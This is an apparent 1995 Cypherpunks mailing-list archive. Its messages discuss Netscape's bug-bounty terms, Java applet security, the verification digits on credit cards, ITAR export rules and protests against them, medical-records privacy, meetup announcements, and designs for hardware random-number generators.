AT&T's "brass" should have used the "Tylenol" or "Perrier" crisis management model on this one. Rather than, "The stick your head in the sand like an ostrich" model. Or the "Gee, maybe if I close my eyes, and pull the covers over my head, the boogie-man will go away" school. Someone has to call them on their collective jump into the World of Management by Denial. The issue here isn't the so-called "reward", the focus should rightly be placed on who knew what and when they knew it, and what they did as a consequence. The issue is whether these Goliath Companies, happily roll the dice when public safety and security is on the line. It's that simple. A real no brainer. > > Has Netscape been pestering > > security experts on the net for free work? Have they been plaguing > > people or lists with email asking the net to do their jobs? > > They do far worse. They claim security when they don't have it, and > when the cypherpunks demonstrate the false claims, Netscape offer > insulting future tribute. I think that if they are sincere, they should > reward the individuals who found the last few holes with $25,000 each, > and show that they really mean business. Actually, they said that they want to "harness" the power of the internet, and in return offered a chance to be enrolled in a contest for a mug or a T-shirt, or maybe ... if they ... in "their sole discretion" thought something was a security bug, then they'd offer a $1,000 award. Not *pestering* security experts, but simply asking them to sorta, kinda take a look at the product. Look, and help build the Companies' fortunes, while the "Creative" talent might get a nice Netscape mug for their troubles. This is what Netscape DID, but this isn't the true issue. The true issue is a question of attitudes, not of monetary compensation. 
I really don't care if Netscape or AT&T offer gold stars and nice little pats on the head, or offer many "millions" or offer $25,000, or expect the world's foremost security auditors to work for T-shirts or a bitta Crackerjack. That's not the issue. I just don't believe that any company should on the one hand represent that they have a secure product -- that they actually care about security -- while on the other hand they take their black-box code and say that anyone who brings an error to their attention -- a critical security flaw -- agrees implicitly to make the report the Company's property -- property to be used at the Company's sole discretion. A security review audit is first and foremost for the benefit of the end users. The audit is not so that the company can use the information for its own purposes. The information is not there so that the company can use a confidential auditor's report on security flaws to spy on their own customers, and its certainly not there to enable a code cover-up. Hell, these firms try to cover up even when the information is PUBLIC, let alone when it's given to them in private. And the crying and whining is unbecoming, because the attempt at private communication was made. It was made with both Netscape, and with AT&T. > > The ironic part is the people who have been the most successful at > > finding bugs are not the ones who are demanding money for it! > You're right. the people who find the bugs simply ask that the public interest be served ... that the Network's interest be served, and that the National interest be served. Defective product serves no one, and adding an object to an existing computing environment under the rubric of an experimental data type serves no-one. Correction, it serves no-one except those who would rather see harm come to the public. Those who value and place their own self-interest above that of others. And the consequnces be damned. 
> The ironic part is that a company that claims to have a "secure" method > for using credit cards on the Internet thinks that their security is so > weak that it only takes $1000 to find a major hole. The ironic part is that even once a critical design flaw is identified, no action is taken by anyone -- even when the person who finds it demands no money whatsoever for it -- the real irony is that the press is silent, and so is the company. See no evil, speak no evil, hear no evil. Let the harm and damage continue ... by my calculation, it's been one month already ... shall we maybe try now for two?? I don't think so. > -- > -> See: Info-Sec Heaven at URL http://all.net > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From EALLENSMITH at mbcl.rutgers.edu Wed Nov 15 18:53:47 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Wed, 15 Nov 95 18:53:47 PST Subject: credit card conventional wisdom (fwd) Message-ID: <01HXOR9P3BB48WY0P1@mbcl.rutgers.edu> From: Simon Spero The printed digits above the embossed account number are the first four digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there to discourage re-embossing of the card with another account number. ---------------------- You may be interested in knowing that this appears to vary depending on the card issuer (or possibly on when the card was issued). My MasterCard (from USAA) has no such printed digits; instead, the entire account number is on the back of the card, plus 3 (I would guess check) digits. -Allen From joelm at eskimo.com Wed Nov 15 20:29:00 1995 From: joelm at eskimo.com (Joel McNamara) Date: Wed, 15 Nov 95 20:29:00 PST Subject: e$: Come aaaannnndddd Get it! In-Reply-To: Message-ID: Although Private Idaho will always remain free, to encourage Ecash use, my Web page will support "donations." 
The initial merchant list sounds like it's going to be a subset of this list. Time to go add the Mark Twain links to the page.

This is going to be fun...

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

From jsw at netscape.com Wed Nov 15 20:29:08 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 15 Nov 95 20:29:08 PST
Subject: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AABCD6.5E6A@netscape.com>

Perry E. Metzger wrote:
>
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release. Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting. Netscape has been shipping the fixed
> > applet security model for over a month (since 2.0Beta1), and
> > Netscape and Sun continue to cooperate and work closely on applet
> > security issues.
>
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like. I know, Jeff, that
> it's all done by different groups -- but the Java stuff I've run in
> 2.0beta2 is so weirdly different than the supposedly compatible stuff
> I've run under HotJava -- especially when it comes to crashing (and it
> HAS crashed on me) that I have serious worries about the security of
> the thing. I'd say the quality looks very much like an alpha release,
> not "beta". I don't want to turn this to Javapunks so I won't say more
> on this topic any time soon -- it's already been beaten into the
> ground.

The version of Java in Netscape is not compatible with the version of Java in the summer release of HotJava. There were incompatible changes made by Sun between their alpha (summer HotJava) and beta (Netscape 2.0 and Sun's JDK Beta).
As I understand the situation, applets that were written for HotJava must be ported to the beta API for them to work with more recent releases of Java.

I would agree that Java is not as stable as the rest of the 2.0 release. That is one reason why we have added a preference to disable Java. If you are worried about it you can just switch it off. I argued for this switch because I knew that there would be people who would not want to trust Java until it had some mileage on it.

The early beta releases we do are mostly intended for developers and early adopters who want early access to the new features. We had a great leap in quality between B1 and B2, and I expect that to continue with the future betas.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Wed Nov 15 05:04:43 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 15 Nov 1995 21:04:43 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To:
Message-ID: <9511151255.AA26027@toad.com>

: It kind of sickens us that we had to do it, but so be it.
:
: Patches that re-implement the PEM code may be available at a foreign
: site soon. If it does show up, we'll point to it - that can't be
: illegal!

I see no reason why they should not be as ``illegal'' as the crypto-with-a-hole silliness. Pointing to software is a pretty effective way of disclosing it, and disclosing cryptographic software--apparently including holes--to foreign persons without a license is a violation of the ITAR.

Of course, the ITAR itself is illegal as it applies to cryptographic software, but I agree that one does not want to be the defendant in a criminal case based on those unconstitutional provisions.

--
Peter D.
Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From jya at pipeline.com Wed Nov 15 06:26:10 1995 From: jya at pipeline.com (John Young) Date: Wed, 15 Nov 1995 22:26:10 +0800 Subject: MED_vac Message-ID: <199511151416.JAA13881@pipe2.nyc.pipeline.com> 11-15-95. NYPaper Page One: "When Patients' Records Are Commodities for Sale." Individual medical records, carrying more sensitive personal information than ever before, are increasingly being gathered and stored by the tens of thousands in commercial databanks maintained by institutions like hospital networks, health maintenance organizations and drug companies. And although there is a Federal law that protects the privacy of video rental lists, private medical information is being bought and sold freely. The issue of medical privacy touches virtually everyone. "It is true to say that if you know a person's history of health problems, then you know more about that person than you would with any other data," said Lawrence O. Gostin, a professor at Georgetown University Law Center. And as medical records start including new genetic information that can predict diseases likely to show up in years to come, they will be able to reveal "not just health histories, but health futures," Mr. Gostin said. Yesterday hearings were held on a bill called the Medical Records Confidentiality Act, intended to establish uniform Federal rules for the use and disclosure of health information. Although the bill details procedures for obtaining consent, it also establishes a formidable list of exceptions to this requirement. The police, health oversight agencies, health information services, public health offices and medical researchers are among those allowed to obtain records of an identified patient without that person's consent and, in many cases without notification. 
MED_vac (15 kb)

From melman at osf.org Wed Nov 15 07:01:56 1995
From: melman at osf.org (Howard Melman)
Date: Wed, 15 Nov 1995 23:01:56 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511151447.AA10433@absolut.osf.org.osf.org>

On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:

> attempts to get secure credit card number transfer on the
> internet are not an end in themselves. they are the first
> steps toward an entirely new transaction system. those who
> see a single step and criticize it as feeble in the
> context of past systems are missing the point and
> apparently can't think past the present nanosecond of
> their lives.

You'll have a hard time convincing folks that they need something better than what works perfectly well today.

Here's another point that I didn't see in your list. Today it might be just as safe to send your CC# over the internet as giving it to a clerk, etc. This is mostly because the number of CC#'s sent over the net vs the whole traffic is small. It is therefore not very cost effective to try to steal credit card numbers over the net vs other means (searching through dumpsters, tapping a phone line near LL Bean, etc.).

If CC# purchases became common over the net, it would become much more valuable to try to steal them from the net and more people would. It would then become much less secure, not for any technical reason but because there will be more crooks exploiting the existing flaws.

Where is it most common to steal cellular phone id's (I'm not sure what they are called, but the id's sent that someone can steal to build a forged cell phone)? At airports. Why? Because more cell phones are used there, everyone uses one as they get on or off a plane. If you want to troll for id's, go to where there are many.
Howard

From rjc at clark.net Wed Nov 15 07:26:44 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 15 Nov 1995 23:26:44 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <9511151215.AA20714@all.net>
Message-ID: <199511151510.KAA23996@clark.net>

>
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

The problems found however, were not fundamental flaws in the Java language itself nor in the Java virtual machine. As I've said many times, you can pretty much rip any i/o capability out of Java by changing the runtime class libraries. If someone finds a way to defeat the Java bytecode verifier/class loader and replace a class in java.* with a more powerful one, then that will be really significant.

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely. This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well. Of course there are still
> some problems left unresolved:

[denial of service problems deleted. ]

>
> Similarly, if your HotJava allows an insecure Postscript implementation
> to interpret postscript files, you're still beat.

This is not a flaw or a feature. If you download a helper app off the internet that has a flaw, it's not a flaw in the browser. Claiming that it is is like claiming that "ftp" or "nfs" has a fatal flaw because it allows you execute untrusted binaries from other computers. Helper apps are in the category of third party add-ons and the responsibility for their correct implementation rests on the companies which sell them. Netscape never claimed the ability to allow users to download executable binary applications from the net and run them without risk.
Netscape doesn't come with a postscript interpreter nor does it have one configured by default, so if the user installs one and configures it, and it has a security flaw, it's not Netscape's fault. Installing helper apps is not "easy" compared with clicking on a Java applet so any user who does it must at least be somewhat knowledgeable.

If a postscript interpreter is implemented in JDK Beta, and it is insecure and it is allowed to interpret postscript files, nothing bad will happen.

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen. My compliments for that.

They've never demonstrated otherwise in my entire history on the Java mailing lists. Their whole mission is to produce a secure environment for executing untrusted applications. The alpha's and beta's of every product have problems, it's to be expected. The whole point of releasing a beta is so that you can get feedback.

-Ray

From merriman at arn.net Wed Nov 15 07:54:17 1995
From: merriman at arn.net (David K. Merriman)
Date: Wed, 15 Nov 1995 23:54:17 +0800
Subject: RSA T-shirt
Message-ID: <199511151531.JAA12350@arnet.arn.net>

FWIW, I finally got a chance to see if my barcoded RSA-in-perl t-shirt would actually scan - and it did! It took a bit of fiddling, but it was scannable using one of those hand-held CCD barcode readers.

Dave Merriman

This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk!
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148

From rsalz at osf.org Wed Nov 15 08:24:16 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 16 Nov 1995 00:24:16 +0800
Subject: credit card conventional wisdom
Message-ID: <9511150243.AA14648@sulphur.osf.org>

>There is in fact a distinction between "card present" and "card not present"
>transactions. AMEX cards for example have an extra group of four digits which
>are not part of the embossed card number. They are used as additional
>verification to prove that a card is present.

So the run-it-through-the-mechanical-device is treated as card not present?

/r$

From hallam at w3.org Wed Nov 15 08:24:34 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 16 Nov 1995 00:24:34 +0800
Subject: credit card conventional wisdom
In-Reply-To: <9511150243.AA14648@sulphur.osf.org>
Message-ID: <9511150255.AA01940@zorch.w3.org>

For AMEX, it appears not! Or at least there is a requirement for the assistant to enter the extra four digits in certain cases. The precise nature of the circumstance when they are required to be card present I am not sure (in fact I would bet they vary).

There is no reason why the magnetic strip should necessarily be considered to be card present. It is easy enough to forge, readers need not be attended (eg petrol pumps).

I'm not sure on the exact rules, I don't pay $80 for the privilege of having plastic! The main point I was responding to was the "add information to card that is not on the stripe" point of the original poster.
Phill

From aleph1 at dfw.net Wed Nov 15 09:53:41 1995
From: aleph1 at dfw.net (Aleph One)
Date: Thu, 16 Nov 1995 01:53:41 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511150512.VAA08514@jobe.shell.portal.com>
Message-ID:

Obviously you never jumped in the garbage bin of a restaurant looking for cc's. Yeah give it to one person... sure.....

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Tue, 14 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> Actually, this is not quite correct. There is a difference if I give a
> credit card to *one* person, or if I give the message containing that
> number to a chain of twenty or thirty strangers to get my information to
> the one person I want to have that information.
>

From rah at shipwright.com Wed Nov 15 10:15:22 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 02:15:22 +0800
Subject: DCSB: "A Middleware Guy Looks at Issues in Digital Commerce"
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

The Digital Commerce Society of Boston
(Formerly The Boston Society for Digital Commerce)

Presents

Rich Salz
Open Software Foundation

"A Middleware Guy Looks at Issues in Digital Commerce"

Tuesday, December 5, 1995
12 - 2 PM
The Downtown Harvard Club of Boston
One Federal Street, Boston, MA

Rich has been with OSF for nearly four years, where he has been the technical lead of the OSF DCE 1.1 and 1.2 releases. He is also helping write the secure multi-threaded WWW server for the DCE-Web project. He has been active in Usenet, and is the author of INN, one of the most popular Usenet/NNTP implementations. His home page is http://www.osf.org/~rsalz.
Rich says: >In the rush to separate lift even more money out of your wallet >-- sorry, to provide consumers with more choice and opportunity >-- the electronic commerce community has largely been ignoring >issues that the distributed systems field has been trying to >address for years. This meeting of the Boston Society for Digital Commerce will be held on Tuesday, December 5, 1995 from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, One Federal Street. The price for lunch is $27.50. This price includes lunch, room rental, and the speaker's lunch. ;-). The Harvard Club *does* have a jacket and tie dress code. We need to receive a company check, or money order, (or if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by Saturday, December 2 (that's two weeks from this Saturday), or you won't be on the list for lunch. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, c/o The Shipwright Development Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they must be made payable to "The Harvard Club of Boston". If anyone has questions, or has a problem with these arrangements (We've had to work with a few glacial A/P departments ourselves, for instance), please let us know via e-mail, and we'll see if we can work something out. January's speaker will be Art Hutchinson of Northeast Consulting Resources, Inc. We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the BSDC Program Commmittee, care of Robert Hettinga, rah at shipwright.com . For more information about the Boston Society for Digital Commerce, send "info bsdc" in the body of a message to majordomo at ai.mit.edu . If you want to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a message to majordomo at ai.mit.edu . 
Looking forward to seeing you there! Cheers, Bob Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMKooW/gyLN8bw6ZVAQFMAQP+MQn6wlKxMVHekN1mruUrwILBR0KTcxSK RQo7ELRJAP0aEiEskio3bphrgCpWgxKHJn9KP3YEHuNbwwXZGVzVTlijvzmbVksf ybtAsspMERb/9yWOe4AT69R/hSTAjEkzCwx86iP4FbjBccPiQPQD1eKJ+4C4obW+ WFuq7mpizeU= =J6UH -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From liberty at gate.net Wed Nov 15 10:51:47 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 16 Nov 1995 02:51:47 +0800 Subject: So. FL Cypherpunks Keysigning/Party Message-ID: <199511151832.NAA33898@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Greetings South Florida cypherpunks-- All cypherpunks in or near Dade county who wish to meet will be getting together at 7:30PM on Wednesday, November 29th. In keeping with past South Florida cypherpunks tradition, we are going to meet where the _beer_ is, and (better yet!) this South Florida cypherpunks meeting will coincide with the monthly meeting of the Miami Area Society of Homebrewers ("M.A.S.H.") at the Abbey Brewing Company on Miami Beach. This bar serves a selection of barsnacks, not quite as extensive as the food at The Riverwalk Brewery, but at least they aren't going out of business... Location: The Abbey Brewing Company (305) 538-8110 1115 16th Street, Miami Beach Directions: [From North: Take I-95 South to 195 exit, over to the beach, and go South on Alton Road. Look for a green sign that says "BAR" atop the building.] [From South: Take I-95 North to 395 exit, over to the beach, and go North on Alton Road. Look for a green sign that says "BAR" atop the building.] 
I will be bringing the videotape of the "Mitchells In The Morning" talkshow featuring PRZ that I mentioned a while ago, but The Abbey has no VCR, and the atmosphere might not be right for a showing. Because the meeting is on Miami Beach, folks from far away are urged to carpool or use Tri-rail to Metrorail and then get a ride from Jim Ray (I will try to stay *somewhat* sober). e-mail for ride or carpool details & I'll try to coordinate the transportation aspect of the meeting for those in need of a ride. Joe Block is willing to coordinate the keysigning aspect of the meeting, and he will post in a few days. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMKoxZm1lp8bpvW01AQHLywP/YUWrjYBGyhTXVNyJa05WrUZPtZcNx2sK e6Q0Zc4CYm2q3y5Xq2jdOz8pql95y2L/anSNAJS3zdAR4SFpGR45ZxNtLXy1YU6r 6KDCwPpjoJ4+aUdXrfcW/2DR3BMatHIy25I26SqWmwiVSFRvjIBEH9PO73QA9c7Z Yo5nKaDvRu0= =oRZQ -----END PGP SIGNATURE----- Regards, Jim Ray "...the politicians have been arguing over whether to increase the budget enormously or just hugely. The news media refer to this process as 'cutting' the budget." -- Dave Barry Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/ ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 (key on page & servers) IANAL ----------------------------------------------------------------------- Help Phil! 
email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________

From jimbell at pacifier.com Wed Nov 15 11:12:24 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 03:12:24 +0800
Subject: Hardware-random-bits interface
Message-ID:

>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source. The interface consists
>of two bits in the standard PC parallel port, one serving as
>the data line and the other the sampling clock.

[stuff deleted]

> Device probing: the device should somehow identify itself
> as a random bit generator. One way to do this is to wire
> one of the parallel port data bits to a status line; for
> example, data bit 0 (pin 2) could be wired to status bit 5
> (pin 12). Software can then twiddle the data bit and
> watch for the response.

I'm not a crypto expert, or a mathematician, or anything like that, but I think I have a few suggestions that you should consider.

1. DON'T let the random-number generator "know" that it is being accessed, even with something as simple as a clock. The reason is that if it became important enough, an agency with a BIG BUDGET could make a custom chip that implemented the same apparently-random function, (but might really be a 10**18 state machine with, say, only 10**6 starting positions) but could be "alerted" and reset by a specific pattern of external accesses, possibly activated by a special-purpose virus. The resulting "fake" chip would appear to result in random output, if never reset, but would produce a data stream with a predictable series with a limited number of starting points.

2.
Since the main goal of the project is to have this end up being an ECONOMICAL board, you'll probably end up with a data stream which has some sort of slight bias in one direction or another. As far as I can see, that's okay, because it merely means that you're getting somewhat less than one bit of randomness with each accessed bit. But as I understand it, the solution to this is to combine the bits in software so that you end up with fewer bits. While it's been months since I've read Schneier's book, I recall that it talked about extracting more-perfectly-randomized bits from a larger collection of not-quite-so-randomized ones.

3. In addition, for most trustworthy results, I think you should XOR the resulting data with a long-period pseudorandom stream of bits derived and modified from some reasonably random inputs, such as keystroke timings and free-running-system-clock bits. The reason is that (as far as this neophyte knows) a stream of GOOD randomized numbers XOR'ed with a stream of reasonably randomized numbers results in a stream at least as randomized as the better source. More importantly, such a procedure should help deter any attempt to corrupt the physically-random source, because even going to that trouble of subverting it they'd defeat only one stage in the process.

4. I think the user should be given the option of socketing the IC's. True, that would make it easier for an interloper to replace, but it would also allow the user to quickly swap the critical chips, possibly at intervals of a few days to a few weeks, to partially guard against sabotage.

5. The whole assemblage should be able to be stored in a package sealed with evidence tape.

From tcmay at got.net Wed Nov 15 11:15:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 16 Nov 1995 03:15:15 +0800
Subject: Hardware-random-bits interface
Message-ID:

At 3:17 PM 11/15/95, David K.
Merriman wrote:
>At 02:31 PM 11/14/95 -0800, you wrote:
>>I've been thinking about physically random bits recently, so
>>I'd like to offer a simple, easily implementable interface to a
>>source of such bits, along with a design sketch using a common
>>radio receiver chip as the noise source.
>
>It sounds like a fairly decent idea, _as long as you shield the bejeebers
>(technical term :-) out of it_. Otherwise, anybody with a signal generator
>could skew your numbers however they saw fit: any component lead can act as
>an antenna, no matter how small that lead is.

But if you "shield the bejeebers out of it," then all the radio receiver generates is whatever signal manages to sneak through--which, ironically, would make it _easier_ for an outside attacker to drive--and some amount of internal receiver/amplifier noise, such as the Johnson noise talked about here. (Every receiver has an "equivalent noise temperature," recall.)

And if one is left with only internal noise, why not simply use a nice clean source like a Zener diode?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From merriman at arn.net Wed Nov 15 11:22:50 1995
From: merriman at arn.net (David K.
Merriman) Date: Thu, 16 Nov 1995 03:22:50 +0800 Subject: Hardware-random-bits interface Message-ID: <199511151519.JAA12151@arnet.arn.net> At 02:31 PM 11/14/95 -0800, you wrote: >I've been thinking about physically random bits recently, so >I'd like to offer a simple, easily implementable interface to a >source of such bits, along with a design sketch using a common >radio receiver chip as the noise source. It sounds like a fairly decent idea, _as long as you shield the bejeebers (technical term :-) out of it_. Otherwise, anybody with a signal generator could skew your numbers however they saw fit: any component lead can act as an antenna, no matter now small that lead is. One way to handle it would be to lay it out as a multi-layer PCB, with the signal & power traces inside, and ground plane on the outer layers. Then enclose the circuit components inside a shielding enclosure (mu-metal would be good) mounted to the PCB, then tuck the entire assembly inside another enclosure (small aluminum box for example, also connected to ground). Of course, there would be easier ways to fabricate it, but they would just make the shielding that much more difficult to implement. Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> My web page: http://www.geopages.com/CapitolHill/1148 From perry at piermont.com Wed Nov 15 11:29:28 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Thu, 16 Nov 1995 03:29:28 +0800 Subject: Hardware-random-bits interface In-Reply-To: Message-ID: <199511151905.OAA08439@jekyll.piermont.com> Timothy C. May writes: > But if you "shield the bejeebers out of it," then all the radio receiver > generates is whatever signal manages to sneak through--which, ironically, > would make it _easier_ for an outside attacker to drive--and some amount of > internal receiver/amplifier noise, such as the Johnson noise talked about > here. (Every receiver has an "equivalent noise temperature," recall.) > > And if one is left with only internal noise, why not simply use a nice > clean source like a Zener diode? Quite solidly agreed. Internal noise beats external noise, and there is no point in using a radio receiver when what you want is internal noise. .pm From sjb at universe.digex.net Wed Nov 15 11:32:09 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Thu, 16 Nov 1995 03:32:09 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <199511151908.OAA05536@universe.digex.net> jim bell writes: >>I think it's 121.1, Category XIII paragraph (b) item (5): >>"Ancillary equipment specifically designed or modified for paragraphs (b) >>(1), (2), (3), (4) and (5) of this category;" > >Question: What makes computers in general NOT describable by such a >paragraph?!? The referenced paragraphsdescribe cryptographic hardware, software and technical data. Computers in general are not "specifically designed" as cryptographic equipment. From vznuri at netcom.com Wed Nov 15 11:45:37 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 16 Nov 1995 03:45:37 +0800 Subject: credit card conventional wisdom In-Reply-To: Message-ID: <199511151924.LAA29261@netcom13.netcom.com> Arley Carter >This may be a stupidly obvious question but..... 
>We could argue until the cows come home, hell freezes over or the Cubs win
>the World Series, what ever comes first ;-) about whether giving your credit
>card number to a waiter or an 800 # clerk is any more or less secure than
>transmitting it encrypted or clear text over a data link.
>

the point of my post was that I AGREE. the only issue is that we should make internet security as superior as possible regardless of the security of credit cards in the real world. I was attacking the line of thought that goes, "credit card security is already marginal, therefore why should anyone try to improve it in cyberspace"? this is circular reasoning. "why should anyone try to make something more secure when it is already insecure?"

>
>I have seen no such statement from the Visa/MasterCard/bank consortiums
>regarding who is at risk if my card number is stolen and used in cyberspace.
>When I get a written indemnification from them stating clearly that
>using my credit card in cyberspace is no different from using in a local
>restaurant, then I see no risk to the user in using the card in cyberspace.

a major point of my post was that even if you think the cost of fraud is invisible to you, it is not. it is in everyone's interest to reduce fraud. if you think you are not paying for it now, you are believing in an illusion. reducing fraud rates will decrease costs for everyone in the long run. it is true that credit card companies try to localize the costs to the areas where their risk is higher (for example, higher interest rates on credit risks, different charges to the merchant for "card present" vs. "card not present" as indicated by the other poster), however I still think it is obvious that these costs are still distributed over all customers.

this is one of the main illusions I was trying to discredit in my original post. the thinking goes like this: "so-and-so does not appear to have any effect on me now, therefore to consider it is irrelevant." in the case of credit card users, they seem to think, "I can already cancel any transactions. illicit purchases made when somebody steals my card in cyberspace are no different". another line of thinking is, "credit cards are already insecure, so who cares if people steal them over the internet". all of these are very specious lines of thought.

your own line is, familiarly, "nothing matters unless it shows up on my own credit card bill" is again in my opinion an invitation to disaster. you are paying for the insecurity of credit cards right now, if not to your credit card company then in slightly increased rates in the goods you buy (to cover the merchant's cost to the credit card company).

>The risk to the bank and merchant.......Now that is a different matter.
>Credit card usage on the net will never take off until this issue is
>solved to the satisfaction of the bank and the user. Until this happens
>arguing this issue is like arguing about how many angels can fit on the
>head of a pin.

part of getting to the point of satisfaction of the bank and user is improved internet security. another point of my post.

From vvallopp at eniac.seas.upenn.edu Wed Nov 15 12:13:40 1995
From: vvallopp at eniac.seas.upenn.edu (Vinod Valloppillil)
Date: Thu, 16 Nov 1995 04:13:40 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <199511151943.OAA01845@blue.seas.upenn.edu>

> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
>

Precisely. It reminds me of a talk given by Dr. John McQuilan (I think it was at one of his High Performance Networks Conferences) where he said that the big administrative headache for high speed networks vs. low speed networks was simply the speed with which you could get in trouble.....

The analogy holds quite true in physical credit cards vs. net credit....

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp at eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------

From pmonta at qualcomm.com Wed Nov 15 12:16:53 1995
From: pmonta at qualcomm.com (Peter Monta)
Date: Thu, 16 Nov 1995 04:16:53 +0800
Subject: Hardware-random-bits interface
